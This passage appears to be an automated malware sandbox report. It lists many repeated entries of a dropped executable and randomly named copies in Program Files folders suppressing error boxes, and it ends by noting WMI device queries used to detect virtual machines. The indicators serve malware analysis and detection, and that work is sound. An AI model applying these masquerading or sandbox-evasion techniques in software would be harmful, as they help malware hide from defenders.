                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
